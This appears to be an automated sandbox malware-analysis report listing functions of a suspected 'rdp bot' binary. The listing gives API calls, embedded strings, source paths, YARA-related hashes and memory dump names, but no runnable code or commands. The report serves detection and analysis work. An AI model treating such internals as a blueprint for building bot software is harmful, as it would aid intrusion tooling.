Opcode Fuzzy Hash: e091a9b40aa408c73ba7d42a196dea1f68ce83149365551fa48ab49a88a7c95c
Instruction Fuzzy Hash: F2315069A08A07A1FF61FB11E9027F4A260BF14789FC459B1D98D476A0EE7CE905E320

Function 00007FF73AFB5923 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF73AFB5969
GetFileSize.KERNEL32 ref: 00007FF73AFB598C
CloseHandle.KERNEL32 ref: 00007FF73AFB59AE
GetLastError.KERNEL32 ref: 00007FF73AFB5A34
GetLastError.KERNEL32 ref: 00007FF73AFB5AFA

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB59DC, 00007FF73AFB5A0C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB59F1, 00007FF73AFB5A21
(size != NULL), xrefs: 00007FF73AFB5A13
fs_file_size, xrefs: 00007FF73AFB59EA, 00007FF73AFB5A1A
(path != NULL), xrefs: 00007FF73AFB59E3

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-1687387729
Opcode ID: f8086f2b627537b5e95a628dd57272a1ba8f50c60a456c5ecc4f2c71c76c20ae
Instruction ID: a2d7bb3865147b5e029c0465b54cc29e1ca605fac8a229409b6fcef00190179a
Opcode Fuzzy Hash: f8086f2b627537b5e95a628dd57272a1ba8f50c60a456c5ecc4f2c71c76c20ae
Instruction Fuzzy Hash: 6F615E59E0C313A6FA607755A046378E3609F41375FA94AB2C89F9B2D0CE2DEC847672

Function 00007FF73AFB3222 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF73AFB3233
GetLastError.KERNEL32 ref: 00007FF73AFB328C

Strings

process_wait, xrefs: 00007FF73AFB3272, 00007FF73AFB329B
P, xrefs: 00007FF73AFB3313
~, xrefs: 00007FF73AFB330E
, xrefs: 00007FF73AFB32AE
(pi != NULL), xrefs: 00007FF73AFB326B
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF73AFB3264
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB3279
[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu), xrefs: 00007FF73AFB32A2

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
API String ID: 1211598281-4195011794
Opcode ID: 3afc064e1e3287de95e3787555b8801013cb86f146be8000e5a04a0980a9d250
Instruction ID: f9e787678c5bc468648cbf1c37088ac7a8a4dd19e05c7686128951299de2fd17
Opcode Fuzzy Hash: 3afc064e1e3287de95e3787555b8801013cb86f146be8000e5a04a0980a9d250
Instruction Fuzzy Hash: 7C316D18F8C303A2FB247B54A48237D92609F44304EE966B2C66F46AD1DDDDED85B361

Function 00007FF73AFB5C44 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF73AFB5CA3
GetFileTime.KERNEL32 ref: 00007FF73AFB5CBE
GetLastError.KERNEL32 ref: 00007FF73AFB5CCC
CloseHandle.KERNEL32 ref: 00007FF73AFB5DEE

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB5CF9, 00007FF73AFB5D2C
fs_file_stat, xrefs: 00007FF73AFB5D07, 00007FF73AFB5D3A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB5D0E, 00007FF73AFB5D41
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FF73AFB5D33
(path != NULL), xrefs: 00007FF73AFB5D00

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-3647951244
Opcode ID: 5898b04b530a3eb72730c06e2ed2310e503f8d4daf76958c07f857f31bedf6ec
Instruction ID: 50d5a08a04899b9a9c3a3ce20b8d55abb06cb5b00ccea5fb9a0879579a4fdb83
Opcode Fuzzy Hash: 5898b04b530a3eb72730c06e2ed2310e503f8d4daf76958c07f857f31bedf6ec
Instruction Fuzzy Hash: 6F518469D0C313A2FB607B11A44A379E360AF047A4F9847B1D95F4B2D8DE3DEC45A361

Function 00007FF73AFBA264 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF73AFBA300
_strtoui64.MSVCRT ref: 00007FF73AFBA316
_errno.MSVCRT ref: 00007FF73AFBA320
_errno.MSVCRT ref: 00007FF73AFBA32C

Strings

ini_get_uint64, xrefs: 00007FF73AFBA2DF, 00007FF73AFBA34C
(value != NULL), xrefs: 00007FF73AFBA2D8
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFBA2D1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFBA2E6
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF73AFBA353

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 297b9f182c8790e678455ce65a3ffe291811cf4302fcd0b67f952994915113c9
Instruction ID: 9c6ea72ff9fae387a4b2dc5731afae0071e71a389907c621b25840c191c107aa
Opcode Fuzzy Hash: 297b9f182c8790e678455ce65a3ffe291811cf4302fcd0b67f952994915113c9
Instruction Fuzzy Hash: 85219E2A608B47A6F361BF55F8427AAB760FB44784F844172EE8C07654DF3DD885E720

Function 00007FF73AFBA824 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF73AFBA8CD
VirtualProtect.KERNEL32 ref: 00007FF73AFBA935
GetLastError.KERNEL32 ref: 00007FF73AFBA93F

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF73AFBA8E2
VirtualProtect failed with code 0x%x, xrefs: 00007FF73AFBA945
Unknown pseudo relocation protocol version %d., xrefs: 00007FF73AFBA829
Address %p has no image-section, xrefs: 00007FF73AFBA885
Mingw-w64 runtime failure:, xrefs: 00007FF73AFBA7EB

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction ID: d19719a6cb86f214ee64bffd82d350026967935dd52a1fbd527477016b0292db
Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
Instruction Fuzzy Hash: 70319239B09B03A6FA00BF16E8461A9A7B1EF84B94F848675DD4C47764EE3CE446A350

Function 00007FF73AFB9F70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF73AFBA00E
_errno.MSVCRT ref: 00007FF73AFBA02C
_errno.MSVCRT ref: 00007FF73AFBA034

Strings

(value != NULL), xrefs: 00007FF73AFB9FE6
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFB9FDF
ini_get_uint16, xrefs: 00007FF73AFB9FED, 00007FF73AFBA055
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB9FF4
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FF73AFBA05C

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 2918714741-1991603811
Opcode ID: 578be8e4d6cdb864bf008146ecc2aa08e574406641cc047416c54626d1d3f0c7
Instruction ID: 9b8c569da72a722f1314daf84e8591c588ce6fa1cf5e85d146e9fe640f14e34b
Opcode Fuzzy Hash: 578be8e4d6cdb864bf008146ecc2aa08e574406641cc047416c54626d1d3f0c7
Instruction Fuzzy Hash: C0218229A08747A2F721AF12E842BAAB770BF44794F844171EE8C07764DF3CE845E710

Function 00007FF73AFB2463 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF73AFB2487
strcmp.MSVCRT ref: 00007FF73AFB24CA
OpenProcess.KERNEL32 ref: 00007FF73AFB24E2
TerminateProcess.KERNEL32 ref: 00007FF73AFB24FC
GetLastError.KERNEL32 ref: 00007FF73AFB250A
Process32Next.KERNEL32 ref: 00007FF73AFB26F5
GetLastError.KERNEL32 ref: 00007FF73AFB2704
CloseHandle.KERNEL32 ref: 00007FF73AFB2895

Strings

process_kill, xrefs: 00007FF73AFB2515
, xrefs: 00007FF73AFB253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF73AFB251C

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: b1245428639a818b82b57766b3220211cd31ffdae2aaeb4b2527d5ebe8a7e941
Instruction ID: fbd8f99c954c1b88dcdf3c9f5bbc29f650b32429ded538b17be028cecf22f7c2
Opcode Fuzzy Hash: b1245428639a818b82b57766b3220211cd31ffdae2aaeb4b2527d5ebe8a7e941
Instruction Fuzzy Hash: F211E91DA0C303B6FA6D7751A482376A270EF05785FC408B5CC4E0B7A5DE2DE845B261

Function 00007FF73AFB2471 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF73AFB2487
strcmp.MSVCRT ref: 00007FF73AFB24CA
OpenProcess.KERNEL32 ref: 00007FF73AFB24E2
TerminateProcess.KERNEL32 ref: 00007FF73AFB24FC
GetLastError.KERNEL32 ref: 00007FF73AFB250A
Process32Next.KERNEL32 ref: 00007FF73AFB26F5
GetLastError.KERNEL32 ref: 00007FF73AFB2704
CloseHandle.KERNEL32 ref: 00007FF73AFB2895

Strings

process_kill, xrefs: 00007FF73AFB2515
, xrefs: 00007FF73AFB253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF73AFB251C

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 158e3072149725f4866144d657acd337f157539e64c9481685aa8a83708855ce
Instruction ID: aee525ddac7397fa84175a6375fd051c09332fb4320cc8a556b7424bc29c6887
Opcode Fuzzy Hash: 158e3072149725f4866144d657acd337f157539e64c9481685aa8a83708855ce
Instruction Fuzzy Hash: DD11E91DA0C303B6FA6C7751A482376E270EF05785FC408B5CC4E0B7A5DE2DE845B261

Function 00007FF73AFB246A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF73AFB2487
strcmp.MSVCRT ref: 00007FF73AFB24CA
OpenProcess.KERNEL32 ref: 00007FF73AFB24E2
TerminateProcess.KERNEL32 ref: 00007FF73AFB24FC
GetLastError.KERNEL32 ref: 00007FF73AFB250A
Process32Next.KERNEL32 ref: 00007FF73AFB26F5
GetLastError.KERNEL32 ref: 00007FF73AFB2704
CloseHandle.KERNEL32 ref: 00007FF73AFB2895

Strings

process_kill, xrefs: 00007FF73AFB2515
, xrefs: 00007FF73AFB253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF73AFB251C

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 36bab34cf3439416bff648658dde056435f9cae3978658a94be91aff7a9a2503
Instruction ID: 199b26515d3d2baf6172ec184a6f7481a7f406386dcea544b3b01f8a2d7afbe4
Opcode Fuzzy Hash: 36bab34cf3439416bff648658dde056435f9cae3978658a94be91aff7a9a2503
Instruction Fuzzy Hash: 8C11E91DB0C303B6FA6C7751A482376A270EF05785FC408B5CC4E0B7A6DE2DE845B261

Function 00007FF73AFB255D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF73AFB2487
strcmp.MSVCRT ref: 00007FF73AFB24CA
OpenProcess.KERNEL32 ref: 00007FF73AFB24E2
TerminateProcess.KERNEL32 ref: 00007FF73AFB24FC
GetLastError.KERNEL32 ref: 00007FF73AFB250A
Process32Next.KERNEL32 ref: 00007FF73AFB26F5
GetLastError.KERNEL32 ref: 00007FF73AFB2704
CloseHandle.KERNEL32 ref: 00007FF73AFB2895

Strings

process_kill, xrefs: 00007FF73AFB2515
, xrefs: 00007FF73AFB253C
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF73AFB251C

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
API String ID: 1211020085-2360327764
Opcode ID: 022af13b32673e7725de95f25d7589f36e6619db3304b5fbefa396f0543736b4
Instruction ID: be6c00f94e8596c40c88d0947b2bdad70d6014b844b7a99d704e30f71295fcf5
Opcode Fuzzy Hash: 022af13b32673e7725de95f25d7589f36e6619db3304b5fbefa396f0543736b4
Instruction Fuzzy Hash: 3011E91DA0C303B6FA6C7751A482376A270EF05785FC408B5CC4E077A5DE2DE845B361

Function 00007FF73AFB5189 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF73AFB5227
GetLastError.KERNEL32 ref: 00007FF73AFB5242

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

Strings

fs_file_copy, xrefs: 00007FF73AFB51F6, 00007FF73AFB5259, 00007FF73AFB53A7
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF73AFB51FD
NULL, xrefs: 00007FF73AFB5385, 00007FF73AFB5391
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF73AFB53AE
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF73AFB5260

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 6ead6bd289564871cbad772da89ece984a2fa5525156020147c622fda4dc3193
Instruction ID: 81529eff32bf9f5508c05ece1cbe294afb71bed7ef60be063e80b16388604b8c
Opcode Fuzzy Hash: 6ead6bd289564871cbad772da89ece984a2fa5525156020147c622fda4dc3193
Instruction Fuzzy Hash: 74418C5D90D717A1FA246706A802379E7607F10BC8ED815B2C94F477E4EEACE681A721

Function 00007FF73AFB4BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FF73AFB4BD4
GetLastError.KERNEL32 ref: 00007FF73AFB4C2B

Strings

fs_file_delete, xrefs: 00007FF73AFB4C0D, 00007FF73AFB4C39, 00007FF73AFB4D69
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB4C40
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4C14
NULL, xrefs: 00007FF73AFB4D5A
[I] (%s) -> Done(path=%s), xrefs: 00007FF73AFB4D70

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 1af045b31d5d25f860d1e91a01d5b1170999442159eac2899485bddb971ebc89
Instruction ID: aad4426b76feab93594afa9ca6be563b11b789825fe62733283a0ace7ff3b3f6
Opcode Fuzzy Hash: 1af045b31d5d25f860d1e91a01d5b1170999442159eac2899485bddb971ebc89
Instruction Fuzzy Hash: FA317F5DE4CF0BB1FA347705A6423B8E2605FA5742ED549B2CA5E072D1ED1CE882B332

Function 00007FF73AFB749C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFB74D6
strlen.MSVCRT ref: 00007FF73AFB74E1

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB751A, 00007FF73AFB7553, 00007FF73AFB758C
C:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FF73AFB7505, 00007FF73AFB753E, 00007FF73AFB7577
(needle != NULL), xrefs: 00007FF73AFB750C
(pattern != NULL), xrefs: 00007FF73AFB7545
((match == NULL) || (match_len != NULL)), xrefs: 00007FF73AFB757E
str_match, xrefs: 00007FF73AFB7513, 00007FF73AFB754C, 00007FF73AFB7585

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

